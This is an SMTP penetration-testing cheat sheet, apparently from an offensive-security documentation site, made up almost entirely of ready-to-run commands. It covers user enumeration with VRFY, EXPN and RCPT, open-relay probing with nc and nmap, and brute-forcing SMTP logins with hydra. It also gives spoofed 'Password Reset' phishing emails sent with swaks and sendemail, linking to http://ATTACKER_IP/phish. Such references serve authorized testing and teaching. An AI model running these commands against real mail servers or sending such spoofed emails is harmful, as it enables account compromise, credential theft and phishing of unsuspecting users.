Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Service Detection

nmap -sV -sC -p 25,587 TARGET

nc -nv TARGET 25

User Enumeration

VRFY

nc -nv TARGET 25
VRFY root
VRFY admin
VRFY user
252 = exists, 550 = doesn’t exist.

EXPN (Mailing List)

EXPN admin

RCPT TO

HELO test
MAIL FROM:<[email protected]m>
RCPT TO:<[email protected]m>
250 = valid, 550 = invalid.

Automated — smtp-user-enum

smtp-user-enum -M VRFY -U users.txt -t TARGET
smtp-user-enum -M RCPT -U users.txt -t TARGET
smtp-user-enum -M EXPN -U users.txt -t TARGET

Nmap

nmap -p 25 --script smtp-enum-users TARGET

Open Relay Detection

nmap -p 25 --script smtp-open-relay TARGET

Manual Check

nc -nv TARGET 25
HELO test
MAIL FROM:<[email protected]m>
RCPT TO:<[email protected]m>
DATA
Subject: Test
Test message
.
QUIT
If 250 OK after DATA → open relay.

Send Email (Phishing / Spoofing)

swaks

swaks --to [email protected] --from [email protected] --server TARGET --header "Subject: Password Reset" --body "Click here: http://ATTACKER_IP/phish"

sendemail

sendemail -t [email protected] -f [email protected] -s TARGET -u "Password Reset" -m "Click http://ATTACKER_IP"

Brute-Force

hydra -L users.txt -P passwords.txt smtp://TARGET
hydra -L users.txt -P passwords.txt smtp://TARGET -s 587

NSE Scripts

nmap -p 25 --script smtp-commands TARGET
nmap -p 25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY} TARGET
nmap -p 25 --script smtp-vuln* TARGET

Quick Reference

CheckCommand
User enum (VRFY)smtp-user-enum -M VRFY -U users.txt -t TARGET
Open relaynmap --script smtp-open-relay TARGET
Send emailswaks --to victim --from admin --server TARGET
Brute-forcehydra -L users.txt -P pass.txt smtp://TARGET